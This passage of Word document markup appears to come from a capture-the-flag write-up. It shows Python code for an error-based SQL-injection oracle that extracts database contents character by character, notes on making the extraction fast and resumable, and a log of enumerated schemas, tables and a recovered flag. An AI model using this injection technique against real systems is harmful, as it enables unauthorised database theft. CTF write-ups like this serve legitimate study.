          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0e1712"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">U = 400000   # row size unit per value step</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MANY = "(SELECT 1 FROM information_schema.tables a,</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">              information_schema.tables b LIMIT 800)"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">def raw_alloc(expr):</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    payload = ("0 UNION ALL SELECT REPEAT('A', ((%s) * %d)) FROM %s z"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               % (expr, U, MANY))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    r = sess.get(BASE, params={"id": payload, "_cb": rand()})</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    m = re.search(r"tried to allocate (\d+)", r.text)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if len(r.text) &gt;= 4550 or not m:</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        return None            # SQL error / NULL / packet error</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return round(int(m.group(1)) / U)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">def read_char(expr, i):</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    sub = "ASCII(SUBSTR((%s), %d, 1))" % (expr, i)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    v = read_value(sub)                     # 1 request: full byte</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if v is None:                           # fallback: hi/lo nibble</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        hi = read_value("(%s DIV 16)" % sub)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        lo = read_value("(%s MOD 16)" % sub)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        v = (hi &lt;&lt; 4) | lo</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return v</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100012" w:name="_Toc100012"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Engineering Choices That Made It Practical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100012"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Four design decisions turned a proof-of-concept oracle into a tool that finishe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">d inside 20-minute instance windows. Each one addressed a constraint observed during probing rather than a hypothetical concern, and together they kept the full extraction schema enumeration through flag verification down to minutes of wall-clock time.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Length first, without giant rows.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> String length is read as three separate decimal digits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LENGTH DIV 100, (LENGTH DIV 10) MOD 10, and LENGTH MOD 10 so the widest single row is only 4.4 MB, safely under any max_allowed_packet. Reading the length directly as one value would have required a row wider than the packet limit and failed immediately.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Auto-degrade per character.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Full-byte mode tries rows up to 50.4 MB (for ASCII 126); if the packet limit rejects that, two nibble requests at rows of 6 MB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">or less recover the same byte as a high and low half; if even that fails, the primitive falls back to a boolean binary search at one bit per request. Every recovered character is validated as printable, and unreadable ones are retried rather than accepted.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Parallel across characters.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Characters are independent of e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ach other, so a 4-5 worker ThreadPoolExecutor extracts a whole string in overlapping waves while each individual request still takes a constant 2.2 seconds. This multiplied throughput by roughly the worker count without changing the request pattern at all.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumable state across instance rotation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every recovered character lands in a J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SON state file keyed by the query expression, so when the instance 404s mid-extraction the operator simply points the script at the fresh URL and it continues where the old one died. No character is ever re-requested unless it previously failed validation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Throughput in practice: enumeration strings (the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP_CONCAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of schemas, tables, and columns) and the flag itself all fell at approximately one request per character. A 24-cha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">racter flag at 2.2 seconds per request, spread over five workers, costs about eleven seconds of pure extraction the real time went into probing, calibration, and repairing transient read failures, all of which fit comfortably inside two instance windows.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100013" w:name="_Toc100013"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Results and Verification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100013"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The extraction ran top-down through the database: readable schemas first, then tables inside the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">chall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> schema, then columns of the two interesting tables, then values. The log below is reproduced from the live run against the rotating instance.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Extraction log</w:t>
      </w:r>
      <w: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Look w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0a120d"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="30" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3ddbb5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] schemata  -&gt; information_schema, performance_schema, chall</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="30" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3ddbb5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] tables    -&gt; flag, users</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="30" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3ddbb5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] columns   -&gt; flag(flag)   |   users(id, username)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="30" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3ddbb5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] users.id  -&gt; 1,2</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="9fc9af"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[~] flag.flag -&gt; '?wnsec{9f5b1c7f391?35d1}'   (2 transient misses)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Two positions in the flag read back as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
